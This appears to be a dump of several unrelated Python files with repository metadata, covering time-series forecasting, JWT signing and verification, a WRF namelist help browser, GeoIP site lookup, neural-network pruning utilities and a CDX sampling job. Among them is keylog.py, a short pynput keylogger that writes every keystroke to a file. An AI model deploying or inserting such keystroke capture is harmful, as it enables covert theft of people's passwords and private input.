"Collect data into fixed-length chunks or blocks"
# grouper('ABCDEFG', 3) --> ABC DEF"
args = [iter(iterable)] * n
return zip(*args)
| 30.89375
| 93
| 0.620676
|
2ee5d43f858504b757d728b4741916e1630ef02e
| 3,840
|
py
|
Python
|
ThymeBoost/predict_functions.py
|
tblume1992/ThymeBoost_old
|
52fe4d8b25d1b2b7b92934010d697735cb7b68b4
|
[
"MIT"
] | null | null | null |
ThymeBoost/predict_functions.py
|
tblume1992/ThymeBoost_old
|
52fe4d8b25d1b2b7b92934010d697735cb7b68b4
|
[
"MIT"
] | null | null | null |
ThymeBoost/predict_functions.py
|
tblume1992/ThymeBoost_old
|
52fe4d8b25d1b2b7b92934010d697735cb7b68b4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
def predict_trend(booster_obj, boosting_round, forecast_horizon):
"""
Predict the trend component using the booster
Parameters
----------
boosting_round : int
The round to reference when getting model params.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
trend_round : np.array
That boosting round's predicted trend component.
"""
trend_param = booster_obj.trend_pred_params[boosting_round]
trend_model = booster_obj.trend_objs[boosting_round].model_obj
trend_round = trend_model.predict(forecast_horizon, trend_param)
return trend_round
def predict_seasonality(booster_obj, boosting_round, forecast_horizon):
"""
Predict the seasonality component using the booster.
Parameters
----------
boosting_round : int
The round to reference when getting model params.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
seas_round : np.array
That boosting round's predicted seasonal component.
"""
seas_param = booster_obj.seasonal_pred_params[boosting_round]
seas_model = booster_obj.seasonal_objs[boosting_round].model_obj
if seas_model is None:
seas_round = np.zeros(forecast_horizon)
else:
seas_round = seas_model.predict(forecast_horizon, seas_param)
return seas_round
def predict_exogenous(booster_obj,
future_exo,
boosting_round,
forecast_horizon):
"""
Predict the exogenous component using the booster.
Parameters
----------
boosting_round : int
The round to reference when getting model params.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
seas_round : np.array
That boosting round's predicted seasonal component.
"""
if future_exo is None:
exo_round = np.zeros(forecast_horizon)
else:
exo_model = booster_obj.exo_objs[boosting_round].model_obj
exo_round = exo_model.predict(future_exo)
return exo_round
def predict_rounds(booster_obj,
forecast_horizon,
future_exo=None):
"""
Predict all the rounds from a booster
Parameters
----------
fitted_output : pd.DataFrame
Output from fit method.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
trend_predictions : np.array
Trend component.
seasonal_predictions : np.array
seasonal component.
predictions : np.array
Predictions.
"""
trend_predictions = np.zeros(forecast_horizon)
seasonal_predictions = np.zeros(forecast_horizon)
exo_predictions = np.zeros(forecast_horizon)
for boosting_round in range(booster_obj.i):
trend_predictions += predict_trend(booster_obj,
boosting_round,
forecast_horizon)
seasonal_predictions += predict_seasonality(booster_obj,
boosting_round,
forecast_horizon)
exo_predictions += predict_exogenous(booster_obj,
future_exo,
boosting_round,
forecast_horizon)
predictions = (trend_predictions +
seasonal_predictions +
exo_predictions)
return trend_predictions, seasonal_predictions, exo_predictions, predictions
| 31.219512
| 81
| 0.59375
|
d2d7a3bbdf4c4f00402868f74bd7bf8e6a72eb3c
| 10,812
|
py
|
Python
|
oauth2client/crypt.py
|
DUYNT/google-api-python-client
|
37d60a2da6864ebef5bd83daa4da680e06e08db3
|
[
"Apache-2.0"
] | 1
|
2015-05-14T00:06:51.000Z
|
2015-05-14T00:06:51.000Z
|
oauth2client/crypt.py
|
DUYNT/google-api-python-client
|
37d60a2da6864ebef5bd83daa4da680e06e08db3
|
[
"Apache-2.0"
] | 1
|
2016-06-23T16:33:52.000Z
|
2016-06-23T16:33:52.000Z
|
oauth2client/crypt.py
|
DUYNT/google-api-python-client
|
37d60a2da6864ebef5bd83daa4da680e06e08db3
|
[
"Apache-2.0"
] | 1
|
2020-07-24T20:04:47.000Z
|
2020-07-24T20:04:47.000Z
|
#!/usr/bin/python2.4
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hashlib
import logging
import time
from anyjson import simplejson
CLOCK_SKEW_SECS = 300 # 5 minutes in seconds
AUTH_TOKEN_LIFETIME_SECS = 300 # 5 minutes in seconds
MAX_TOKEN_LIFETIME_SECS = 86400 # 1 day in seconds
logger = logging.getLogger(__name__)
class AppIdentityError(Exception):
pass
try:
from OpenSSL import crypto
class OpenSSLVerifier(object):
"""Verifies the signature on a message."""
def __init__(self, pubkey):
"""Constructor.
Args:
pubkey, OpenSSL.crypto.PKey, The public key to verify with.
"""
self._pubkey = pubkey
def verify(self, message, signature):
"""Verifies a message against a signature.
Args:
message: string, The message to verify.
signature: string, The signature on the message.
Returns:
True if message was signed by the private key associated with the public
key that this object was constructed with.
"""
try:
crypto.verify(self._pubkey, signature, message, 'sha256')
return True
except:
return False
@staticmethod
def from_string(key_pem, is_x509_cert):
"""Construct a Verified instance from a string.
Args:
key_pem: string, public key in PEM format.
is_x509_cert: bool, True if key_pem is an X509 cert, otherwise it is
expected to be an RSA key in PEM format.
Returns:
Verifier instance.
Raises:
OpenSSL.crypto.Error if the key_pem can't be parsed.
"""
if is_x509_cert:
pubkey = crypto.load_certificate(crypto.FILETYPE_PEM, key_pem)
else:
pubkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key_pem)
return OpenSSLVerifier(pubkey)
class OpenSSLSigner(object):
"""Signs messages with a private key."""
def __init__(self, pkey):
"""Constructor.
Args:
pkey, OpenSSL.crypto.PKey (or equiv), The private key to sign with.
"""
self._key = pkey
def sign(self, message):
"""Signs a message.
Args:
message: string, Message to be signed.
Returns:
string, The signature of the message for the given key.
"""
return crypto.sign(self._key, message, 'sha256')
@staticmethod
def from_string(key, password='notasecret'):
"""Construct a Signer instance from a string.
Args:
key: string, private key in PKCS12 or PEM format.
password: string, password for the private key file.
Returns:
Signer instance.
Raises:
OpenSSL.crypto.Error if the key can't be parsed.
"""
parsed_pem_key = _parse_pem_key(key)
if parsed_pem_key:
pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, parsed_pem_key)
else:
pkey = crypto.load_pkcs12(key, password).get_privatekey()
return OpenSSLSigner(pkey)
except ImportError:
OpenSSLVerifier = None
OpenSSLSigner = None
try:
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from Crypto.Signature import PKCS1_v1_5
class PyCryptoVerifier(object):
"""Verifies the signature on a message."""
def __init__(self, pubkey):
"""Constructor.
Args:
pubkey, OpenSSL.crypto.PKey (or equiv), The public key to verify with.
"""
self._pubkey = pubkey
def verify(self, message, signature):
"""Verifies a message against a signature.
Args:
message: string, The message to verify.
signature: string, The signature on the message.
Returns:
True if message was signed by the private key associated with the public
key that this object was constructed with.
"""
try:
return PKCS1_v1_5.new(self._pubkey).verify(
SHA256.new(message), signature)
except:
return False
@staticmethod
def from_string(key_pem, is_x509_cert):
"""Construct a Verified instance from a string.
Args:
key_pem: string, public key in PEM format.
is_x509_cert: bool, True if key_pem is an X509 cert, otherwise it is
expected to be an RSA key in PEM format.
Returns:
Verifier instance.
Raises:
NotImplementedError if is_x509_cert is true.
"""
if is_x509_cert:
raise NotImplementedError(
'X509 certs are not supported by the PyCrypto library. '
'Try using PyOpenSSL if native code is an option.')
else:
pubkey = RSA.importKey(key_pem)
return PyCryptoVerifier(pubkey)
class PyCryptoSigner(object):
"""Signs messages with a private key."""
def __init__(self, pkey):
"""Constructor.
Args:
pkey, OpenSSL.crypto.PKey (or equiv), The private key to sign with.
"""
self._key = pkey
def sign(self, message):
"""Signs a message.
Args:
message: string, Message to be signed.
Returns:
string, The signature of the message for the given key.
"""
return PKCS1_v1_5.new(self._key).sign(SHA256.new(message))
@staticmethod
def from_string(key, password='notasecret'):
"""Construct a Signer instance from a string.
Args:
key: string, private key in PEM format.
password: string, password for private key file. Unused for PEM files.
Returns:
Signer instance.
Raises:
NotImplementedError if they key isn't in PEM format.
"""
parsed_pem_key = _parse_pem_key(key)
if parsed_pem_key:
pkey = RSA.importKey(parsed_pem_key)
else:
raise NotImplementedError(
'PKCS12 format is not supported by the PyCrpto library. '
'Try converting to a "PEM" '
'(openssl pkcs12 -in xxxxx.p12 -nodes -nocerts > privatekey.pem) '
'or using PyOpenSSL if native code is an option.')
return PyCryptoSigner(pkey)
except ImportError:
PyCryptoVerifier = None
PyCryptoSigner = None
if OpenSSLSigner:
Signer = OpenSSLSigner
Verifier = OpenSSLVerifier
elif PyCryptoSigner:
Signer = PyCryptoSigner
Verifier = PyCryptoVerifier
else:
raise ImportError('No encryption library found. Please install either '
'PyOpenSSL, or PyCrypto 2.6 or later')
def _parse_pem_key(raw_key_input):
"""Identify and extract PEM keys.
Determines whether the given key is in the format of PEM key, and extracts
the relevant part of the key if it is.
Args:
raw_key_input: The contents of a private key file (either PEM or PKCS12).
Returns:
string, The actual key if the contents are from a PEM file, or else None.
"""
offset = raw_key_input.find('-----BEGIN ')
if offset != -1:
return raw_key_input[offset:]
else:
return None
def _urlsafe_b64encode(raw_bytes):
return base64.urlsafe_b64encode(raw_bytes).rstrip('=')
def _urlsafe_b64decode(b64string):
# Guard against unicode strings, which base64 can't handle.
b64string = b64string.encode('ascii')
padded = b64string + '=' * (4 - len(b64string) % 4)
return base64.urlsafe_b64decode(padded)
def _json_encode(data):
return simplejson.dumps(data, separators = (',', ':'))
def make_signed_jwt(signer, payload):
"""Make a signed JWT.
See http://self-issued.info/docs/draft-jones-json-web-token.html.
Args:
signer: crypt.Signer, Cryptographic signer.
payload: dict, Dictionary of data to convert to JSON and then sign.
Returns:
string, The JWT for the payload.
"""
header = {'typ': 'JWT', 'alg': 'RS256'}
segments = [
_urlsafe_b64encode(_json_encode(header)),
_urlsafe_b64encode(_json_encode(payload)),
]
signing_input = '.'.join(segments)
signature = signer.sign(signing_input)
segments.append(_urlsafe_b64encode(signature))
logger.debug(str(segments))
return '.'.join(segments)
def verify_signed_jwt_with_certs(jwt, certs, audience):
"""Verify a JWT against public certs.
See http://self-issued.info/docs/draft-jones-json-web-token.html.
Args:
jwt: string, A JWT.
certs: dict, Dictionary where values of public keys in PEM format.
audience: string, The audience, 'aud', that this JWT should contain. If
None then the JWT's 'aud' parameter is not verified.
Returns:
dict, The deserialized JSON payload in the JWT.
Raises:
AppIdentityError if any checks are failed.
"""
segments = jwt.split('.')
if (len(segments) != 3):
raise AppIdentityError(
'Wrong number of segments in token: %s' % jwt)
signed = '%s.%s' % (segments[0], segments[1])
signature = _urlsafe_b64decode(segments[2])
# Parse token.
json_body = _urlsafe_b64decode(segments[1])
try:
parsed = simplejson.loads(json_body)
except:
raise AppIdentityError('Can\'t parse token: %s' % json_body)
# Check signature.
verified = False
for (keyname, pem) in certs.items():
verifier = Verifier.from_string(pem, True)
if (verifier.verify(signed, signature)):
verified = True
break
if not verified:
raise AppIdentityError('Invalid token signature: %s' % jwt)
# Check creation timestamp.
iat = parsed.get('iat')
if iat is None:
raise AppIdentityError('No iat field in token: %s' % json_body)
earliest = iat - CLOCK_SKEW_SECS
# Check expiration timestamp.
now = long(time.time())
exp = parsed.get('exp')
if exp is None:
raise AppIdentityError('No exp field in token: %s' % json_body)
if exp >= now + MAX_TOKEN_LIFETIME_SECS:
raise AppIdentityError(
'exp field too far in future: %s' % json_body)
latest = exp + CLOCK_SKEW_SECS
if now < earliest:
raise AppIdentityError('Token used too early, %d < %d: %s' %
(now, earliest, json_body))
if now > latest:
raise AppIdentityError('Token used too late, %d > %d: %s' %
(now, latest, json_body))
# Check audience.
if audience is not None:
aud = parsed.get('aud')
if aud is None:
raise AppIdentityError('No aud field in token: %s' % json_body)
if aud != audience:
raise AppIdentityError('Wrong recipient, %s != %s: %s' %
(aud, audience, json_body))
return parsed
| 27.234257
| 80
| 0.661487
|
2c934d65a52053af9a36cfae28b9a50a26a4be7b
| 3,527
|
py
|
Python
|
gis4wrf/plugin/ui/browser_nml_schema.py
|
XavierCLL/gis4wrf
|
686b167d656f5f1835858f1b94de4423091f957c
|
[
"MIT"
] | 1
|
2018-09-09T16:40:18.000Z
|
2018-09-09T16:40:18.000Z
|
gis4wrf/plugin/ui/browser_nml_schema.py
|
mostamndi/gis4wrf
|
93eb69e5f2e87e9805dcaf8fee05db0228fd81c4
|
[
"MIT"
] | null | null | null |
gis4wrf/plugin/ui/browser_nml_schema.py
|
mostamndi/gis4wrf
|
93eb69e5f2e87e9805dcaf8fee05db0228fd81c4
|
[
"MIT"
] | 1
|
2019-11-10T04:52:35.000Z
|
2019-11-10T04:52:35.000Z
|
from typing import Tuple, Set, Any
from PyQt5.QtWidgets import QTextBrowser
class NmlSchemaBrowser(QTextBrowser):
def __init__(self, nml_schema: dict):
super().__init__()
html, self.anchors = get_schema_html(nml_schema)
# TODO set encoding of help page, e.g. degree symbol appears incorrect
self.setText(html)
def to_fortran(val: Any) -> str:
if val is True:
return '.true.'
if val is False:
return '.false.'
if isinstance(val, str):
val = f"'{val}'"
return str(val)
def get_schema_html(nml_schema: dict) -> Tuple[str, Set[str]]:
nml_html = '<html>'
anchors = set() # type: Set[str]
for section_name, section in nml_schema.items():
anchors.add(section_name)
nml_html += f'<h2><a name="{section_name}">&{section_name}</a></h2>'
for var_name, variable in section.items():
anchors.add(var_name)
description = variable['description']
type_ = variable['type']
item_type = variable.get('itemtype')
min_len = variable.get('minlen')
min_ = variable.get('min')
max_ = variable.get('max')
if item_type:
type_label += f' of {item_type}'
else:
type_label = type_
default = variable.get('default')
example = variable.get('example')
options = variable.get('options')
nml_html += f'<h3><a name="{var_name}">{var_name}</a></h3>'
nml_html += f'<p>{description}</p>'
nml_html += f'Type: {type_}<br>'
if min_len is not None:
if isinstance(min_len, str):
min_len = f'<a href="#{min_len}">{min_len}</a>'
nml_html += f'Length: {min_len}<br>'
if min_ is not None:
nml_html += f'Min: <code>{min_}</code><br>'
if max_ is not None:
nml_html += f'Max: <code>{max_}</code><br>'
if default is not None:
default_ = to_fortran(default)
if type_ == 'list':
if default == []:
nml_html += f'Default: empty list'
else:
nml_html += f'Default: list of <code>{default_}</code>'
else:
nml_html += f'Default: <code>{default_}</code><br>'
if example is not None:
val_type = item_type if item_type else type_
if isinstance(example, str) and val_type != 'str':
# Here we have a literal example in Fortran syntax,
# so we avoid surrounding it with single quotes.
pass
else:
example = to_fortran(example)
nml_html += f'Example: <code>{example}</code><br>'
if options:
if isinstance(options, list):
nml_html += 'Options: <code>' + ', '.join(map(to_fortran, options)) + '</code><br>'
else:
nml_html += '<br>Options: <table border=1>'
for val, description in options.items():
val = to_fortran(val)
nml_html += f'<tr><td width="30%" align="center"><code>{val}</code></td>'
nml_html += f'<td width="70%">{description}</td></tr>'
nml_html += '</table>'
nml_html += '</html>'
return nml_html, anchors
| 41.494118
| 103
| 0.505529
|
9bff0b8a0cf820bd81332f9046c79ea56b29a8f4
| 2,476
|
py
|
Python
|
froide/foisite/models.py
|
OpendataCH/froide
|
8136bac0d8caa56f9cfc7ba15480be987280e55d
|
[
"MIT"
] | null | null | null |
froide/foisite/models.py
|
OpendataCH/froide
|
8136bac0d8caa56f9cfc7ba15480be987280e55d
|
[
"MIT"
] | null | null | null |
froide/foisite/models.py
|
OpendataCH/froide
|
8136bac0d8caa56f9cfc7ba15480be987280e55d
|
[
"MIT"
] | null | null | null |
import logging
from django.conf import settings
from django.db import models
from django.dispatch import receiver
from django.utils.translation import gettext_lazy as _
logger = logging.getLogger(__name__)
class FoiSite(models.Model):
country_code = models.CharField(_("Country Code"), max_length=5)
country_name = models.CharField(_("Country Name"), max_length=255)
name = models.CharField(_("Name"), max_length=255)
url = models.CharField(_("URL"), max_length=255)
text = models.TextField(_("Text"), blank=True)
enabled = models.BooleanField(_("Enabled"), default=True)
class Meta:
verbose_name = _("FOI Site")
verbose_name_plural = _("FOI Sites")
def __str__(self):
return "%s (%s)" % (self.name, self.country_name)
def save(self, *args, **kwargs):
self.country_code = self.country_code.upper()
super(FoiSite, self).save(*args, **kwargs)
try:
from django.contrib.gis.geoip2 import GeoIP2
except ImportError:
GeoIP2 = None # noqa
class SiteAdivsor(object):
def __init__(self):
self.geoip = self.get_geoip()
self.sites = None
def get_geoip(self):
if GeoIP2 is None:
return None
try:
return GeoIP2()
except Exception as e:
logger.exception(e)
def update(self):
sites = FoiSite.objects.filter(enabled=True)
self.sites = dict([(f.country_code, f) for f in sites])
def refresh(self):
self.sites = None
def get_site(self, ip):
if self.sites is None:
self.update()
if ip == "127.0.0.1":
return None
try:
if self.geoip is None:
self.geoip = self.get_geoip()
if self.geoip is None:
return
result = self.geoip.country(ip)
except Exception as e:
logger.warning(e)
# try recreating the geoIP2 object
self.geoip = self.get_geoip()
return None
return self.sites.get(result["country_code"], None)
class DummyAdvisor(object):
def refresh(self):
pass
def get_site(self, ip):
pass
if GeoIP2 and getattr(settings, "GEOIP_PATH", False):
advisor = SiteAdivsor()
else:
advisor = DummyAdvisor()
@receiver(models.signals.post_save, sender=FoiSite, dispatch_uid="foisite_saved")
def foisite_saved(instance=None, created=False, **kwargs):
advisor.refresh()
| 26.623656
| 81
| 0.623183
|
adf5494c5d195fe63cdc1522ba29c7002769652a
| 380
|
py
|
Python
|
keylog.py
|
trackmastersteve/keylogger
|
3870f32ff44e12206ff343dbf6f6e330ce3909df
|
[
"MIT"
] | 1
|
2018-10-10T00:41:40.000Z
|
2018-10-10T00:41:40.000Z
|
keylog.py
|
trackmastersteve/keylogger
|
3870f32ff44e12206ff343dbf6f6e330ce3909df
|
[
"MIT"
] | null | null | null |
keylog.py
|
trackmastersteve/keylogger
|
3870f32ff44e12206ff343dbf6f6e330ce3909df
|
[
"MIT"
] | null | null | null |
# keylogger.py
from pynput.keyboard import Key, Listener
import logging
log_dir = ""
logging.basicConfig(filename=(log_dir + "keylog.txt"), level=logging.DEBUG, format='%(asctime)s: %(messages)s:')
def on_press(key):
logging.info(str(key))
#if key == Key.esc:
#return False # Stop listener
with Listener(on_press=on_press) as listener:
listener.join()
| 23.75
| 112
| 0.692105
|
92a62dff0c82d94fc3374f160672012b712e8b43
| 3,837
|
py
|
Python
|
utils/net_utils.py
|
isamu-isozaki/hidden-networks
|
7dcb96a7de43b65ffde176d771f88b5ecedb84ab
|
[
"Apache-2.0"
] | 132
|
2019-12-03T19:02:36.000Z
|
2022-03-27T15:56:43.000Z
|
utils/net_utils.py
|
isamu-isozaki/hidden-networks
|
7dcb96a7de43b65ffde176d771f88b5ecedb84ab
|
[
"Apache-2.0"
] | 9
|
2019-12-05T16:28:33.000Z
|
2022-02-21T21:49:13.000Z
|
utils/net_utils.py
|
isamu-isozaki/hidden-networks
|
7dcb96a7de43b65ffde176d771f88b5ecedb84ab
|
[
"Apache-2.0"
] | 45
|
2019-12-04T00:11:53.000Z
|
2022-03-30T21:07:37.000Z
|
from functools import partial
import os
import pathlib
import shutil
import math
import torch
import torch.nn as nn
def save_checkpoint(state, is_best, filename="checkpoint.pth", save=False):
filename = pathlib.Path(filename)
if not filename.parent.exists():
os.makedirs(filename.parent)
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, str(filename.parent / "model_best.pth"))
if not save:
os.remove(filename)
def get_lr(optimizer):
return optimizer.param_groups[0]["lr"]
def freeze_model_weights(model):
print("=> Freezing model weights")
for n, m in model.named_modules():
if hasattr(m, "weight") and m.weight is not None:
print(f"==> No gradient to {n}.weight")
m.weight.requires_grad = False
if m.weight.grad is not None:
print(f"==> Setting gradient of {n}.weight to None")
m.weight.grad = None
if hasattr(m, "bias") and m.bias is not None:
print(f"==> No gradient to {n}.bias")
m.bias.requires_grad = False
if m.bias.grad is not None:
print(f"==> Setting gradient of {n}.bias to None")
m.bias.grad = None
def freeze_model_subnet(model):
print("=> Freezing model subnet")
for n, m in model.named_modules():
if hasattr(m, "scores"):
m.scores.requires_grad = False
print(f"==> No gradient to {n}.scores")
if m.scores.grad is not None:
print(f"==> Setting gradient of {n}.scores to None")
m.scores.grad = None
def unfreeze_model_weights(model):
print("=> Unfreezing model weights")
for n, m in model.named_modules():
if hasattr(m, "weight") and m.weight is not None:
print(f"==> Gradient to {n}.weight")
m.weight.requires_grad = True
if hasattr(m, "bias") and m.bias is not None:
print(f"==> Gradient to {n}.bias")
m.bias.requires_grad = True
def unfreeze_model_subnet(model):
print("=> Unfreezing model subnet")
for n, m in model.named_modules():
if hasattr(m, "scores"):
print(f"==> Gradient to {n}.scores")
m.scores.requires_grad = True
def set_model_prune_rate(model, prune_rate):
print(f"==> Setting prune rate of network to {prune_rate}")
for n, m in model.named_modules():
if hasattr(m, "set_prune_rate"):
m.set_prune_rate(prune_rate)
print(f"==> Setting prune rate of {n} to {prune_rate}")
def accumulate(model, f):
acc = 0.0
for child in model.children():
acc += accumulate(child, f)
acc += f(model)
return acc
class LabelSmoothing(nn.Module):
"""
NLL loss with label smoothing.
"""
def __init__(self, smoothing=0.0):
"""
Constructor for the LabelSmoothing module.
:param smoothing: label smoothing factor
"""
super(LabelSmoothing, self).__init__()
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
def forward(self, x, target):
logprobs = torch.nn.functional.log_softmax(x, dim=-1)
nll_loss = -logprobs.gather(dim=-1, index=target.unsqueeze(1))
nll_loss = nll_loss.squeeze(1)
smooth_loss = -logprobs.mean(dim=-1)
loss = self.confidence * nll_loss + self.smoothing * smooth_loss
return loss.mean()
class SubnetL1RegLoss(nn.Module):
def __init__(self):
super().__init__()
def forward(self, model, temperature=1.0):
l1_accum = 0.0
for n, p in model.named_parameters():
if n.endswith("scores"):
l1_accum += (p*temperature).sigmoid().sum()
return l1_accum
| 27.604317
| 75
| 0.593954
|
9091ee732a1e387a39ab13e63f41e1d4618c9c14
| 3,405
|
py
|
Python
|
samplecdxjob.py
|
ikreymer/webarchive-indexing
|
2cfe14dbd86be78b3710c98744503f8a34dd76a5
|
[
"MIT"
] | 35
|
2015-03-09T23:47:07.000Z
|
2021-04-19T11:40:48.000Z
|
samplecdxjob.py
|
ikreymer/webarchive-indexing
|
2cfe14dbd86be78b3710c98744503f8a34dd76a5
|
[
"MIT"
] | 10
|
2015-03-13T01:07:47.000Z
|
2018-10-18T15:07:24.000Z
|
samplecdxjob.py
|
ikreymer/webarchive-indexing
|
2cfe14dbd86be78b3710c98744503f8a34dd76a5
|
[
"MIT"
] | 7
|
2015-06-11T16:59:26.000Z
|
2017-12-04T12:48:40.000Z
|
import random
from heapq import heappush, heapreplace
from mrjob.job import MRJob
from mrjob.protocol import RawValueProtocol
#=============================================================================
class SampleCDXJob(MRJob):
""" Sample CDX key space using reservoir sampling
MR algorithm adapted:
http://had00b.blogspot.com/2013/07/random-subset-in-mapreduce.html
"""
HADOOP_INPUT_FORMAT = 'org.apache.hadoop.mapred.lib.CombineTextInputFormat'
INPUT_PROTOCOL = RawValueProtocol
OUTPUT_PROTOCOL = RawValueProtocol
JOBCONF = {'mapreduce.task.timeout': '9600000',
'mapreduce.input.fileinputformat.split.maxsize': '50000000',
'mapreduce.map.speculative': 'false',
'mapreduce.reduce.speculative': 'false',
'mapreduce.job.jvm.numtasks': '-1',
# the output should not be compressed even if the default is to compress output,
# otherwise reading from MRJobRunner.stream_output() needs decompression on the fly
'mapreduce.output.fileoutputformat.compress': 'false',
'mapreduce.job.reduces': '1'
}
def configure_options(self):
"""Custom command line options for indexing"""
super(SampleCDXJob, self).configure_options()
self.add_passthrough_option('--shards', dest='shards',
type=int,
default=300,
help='Number of shards in output ' +
'(create shards-1 splits')
self.add_passthrough_option('--scaler', dest='scaler',
type=int,
default=100,
help='Scaler for sample size: ' +
'Sample size = shards * scaler')
self.add_passthrough_option('--splitfile', dest='splitfile',
help='Split file output dest, ' +
'will contain shards-1 splits')
def mapper_init(self):
self.N = self.options.shards * self.options.scaler
self.H = []
def mapper(self, _, line):
line = line.split('\t')[-1]
if line.startswith(' CDX'):
return
r = random.random()
if len(self.H) < self.N:
heappush(self.H, (r, line))
elif r > self.H[0][0]:
heapreplace(self.H, (r, line))
def mapper_final(self):
for (r, x) in self.H:
# by negating the id, the reducer receives
# the elements from highest to lowest
yield -r, x
def reducer_init(self):
self.N = self.options.shards * self.options.scaler
self.output_list = []
def reducer(self, key, values):
for x in values:
if len(self.output_list) >= self.N:
return
self.output_list.append(x)
def reducer_final(self):
# sample sorted list by scaler, skip first element
# to get a N-1 even samples from N*SCALER set
self.output_list = sorted(self.output_list)
self.output_list = self.output_list[0::self.options.scaler][1:]
for x in self.output_list:
yield '', x
if __name__ == "__main__":
SampleCDXJob().run()
| 34.744898
| 99
| 0.537445
|
55cbb8568d9993b1c86ec5440d480cfb230386b0
| 5,162
|
py
|
Python
|
GUI/gui.py
|
KonstantinosKaratzidis/ActivePlant
|
3ae7b5ac9986a7510819753ba93984f59ee060ae
|
[
"MIT"
] | null | null | null |
GUI/gui.py
|
KonstantinosKaratzidis/ActivePlant
|
3ae7b5ac9986a7510819753ba93984f59ee060ae
|
[
"MIT"
] | null | null | null |
GUI/gui.py
|
KonstantinosKaratzidis/ActivePlant
|
3ae7b5ac9986a7510819753ba93984f59ee060ae
|
[
"MIT"
] | null | null | null |
from PyQt5.QtWidgets import QApplication, QMainWindow
from generated.main_window import Ui_MainWindow
from port_selector import PortSelector
from fatal import FatalMessage
from plant import Plant, import_plants
from proto import PlantConnection, ResponseTimeout
from settings import Settings
import time
from serial import Serial
from serial.tools.list_ports import comports
from sys import argv
MAX_MOISTURE = 1024
MAX_WATER_LEVEL = 4
class MainWindow(QMainWindow):
def __init__(self, *args):
super().__init__(*args)
self.conn = None
self.plants = import_plants()
self._window = Ui_MainWindow()
self._window.setupUi(self)
self.rightColumn = self._window.rightColumn
self.leftColumn = self._window.leftColumn
self.connectionLabel = self._window.statusLabel
self.waterBar = self._window.waterLevelBar
self.moistureBar = self._window.moistureLevelBar
self._set_ranges()
self.set_water(0)
self.set_moisture(0)
self.plantsList = self._window.plantsList
self.currentPlant = None
self.set_disconnected()
self.set_plants()
self.plantsList.currentRowChanged.connect(self.set_selected_plant)
self._window.refreshButton.clicked.connect(self.set_selected_plant)
self._window.changeSettingsButton.clicked.connect(self.changeSettings)
self.targetMoisture = 0
self.waterInterval = 0
def setConnection(self, plantConnection):
self.conn = plantConnection
def _set_ranges(self):
self.waterBar.setMaximum(MAX_WATER_LEVEL)
self.moistureBar.setMaximum(MAX_MOISTURE)
def changeSettings(self):
dialog = Settings(self.targetMoisture, self.waterInterval, self)
dialog.settingsChanged.connect(self.setNewSettings)
dialog.show()
def setNewSettings(self, target_moisture, water_interval):
index = self.plantsList.currentRow()
plant = self.plants[index]
print("set new settings", hex(plant.address), target_moisture, water_interval)
self.set_disconnected()
try:
self.conn.write_moisture_wanted(plant.address, target_moisture)
self.conn.write_water_interval(plant.address, water_interval)
self.set_selected_plant(index)
self.set_connected()
except ResponseTimeout:
print("Failed to set new settings")
self.set_disconnected()
def set_water(self, value):
self.moistureBar.setValue(value)
def set_moisture(self, value):
self.moistureBar.setValue(value)
def set_target_moisture(self, target_moisture):
self._window.targetMoistureLabel.setText(str(target_moisture))
self.targetMoisture = target_moisture
def set_water_interval(self, water_interval):
self._window.wateringMethodLabel.setText(str(water_interval))
self.waterInterval = water_interval
def set_status(self, water_level, moisture_level, target_moisture, water_interval):
self.set_water(water_level)
self.set_moisture(moisture_level)
self.set_target_moisture(target_moisture)
self.set_water_interval(water_interval)
def set_connected(self):
self.rightColumn.setEnabled(True)
self.connectionLabel.setText("Connected")
self.connectionLabel.setStyleSheet("QLabel {color : green;}")
def set_disconnected(self):
self.rightColumn.setEnabled(False)
self.connectionLabel.setText("Disconnected")
self.connectionLabel.setStyleSheet("QLabel {color : red;}")
def set_plants(self):
for plant in self.plants:
self.plantsList.addItem(plant.name)
def set_selected_plant(self, index):
plant = self.plants[index]
self.currentPlant = plant
try:
self.conn.ping(plant.address)
moisture = self.conn.read_moisture(plant.address)
water_level = self.conn.read_water_level(plant.address)
target_moisture = self.conn.read_moisture_wanted(plant.address)
water_interval = self.conn.read_water_interval(plant.address)
self.set_status(water_level, moisture, target_moisture, water_interval)
self.set_connected()
except ResponseTimeout:
print("Failed to ping device")
self.set_disconnected()
class App(QApplication):
def __init__(self, *args):
super().__init__(*args)
plants = [Plant("Plant 1", 0xa0), Plant("Plant 2", 0xb0)]
available_ports = list([port.device for port in comports()])
self.portSelector = PortSelector(available_ports)
self.portSelector.show()
self.portSelector.portSelected.connect(self.set_port)
self.portSelector.canceled.connect(self.quit)
self.main_win = MainWindow()
def set_port(self, portName):
self.portSelector.close()
connection = PlantConnection(0x01, Serial(portName, timeout = 2), 2)
self.main_win.show()
self.main_win.setConnection(connection)
if __name__ == "__main__":
app = App(argv)
app.exec_()
| 34.413333
| 87
| 0.691592
|
4ba57fdd5c31312965c809f2cb7510719a78d427
| 5,944
|
py
|
Python
|
Arbitrage/ArbitrageBot/rebalancing.py
|
LabMazurokCom/Blockchain
|
6f0d8a2ce52434b70e698ce0cc75e46f442daa1c
|
[
"MIT"
] | 13
|
2018-04-05T11:56:04.000Z
|
2021-01-13T02:39:47.000Z
|
Arbitrage/ArbitrageBot/rebalancing.py
|
LabMazurokCom/Blockchain
|
6f0d8a2ce52434b70e698ce0cc75e46f442daa1c
|
[
"MIT"
] | 40
|
2018-03-28T14:14:19.000Z
|
2018-07-11T12:46:21.000Z
|
Arbitrage/ArbitrageBot/rebalancing.py
|
LabMazurokCom/Blockchain
|
6f0d8a2ce52434b70e698ce0cc75e46f442daa1c
|
[
"MIT"
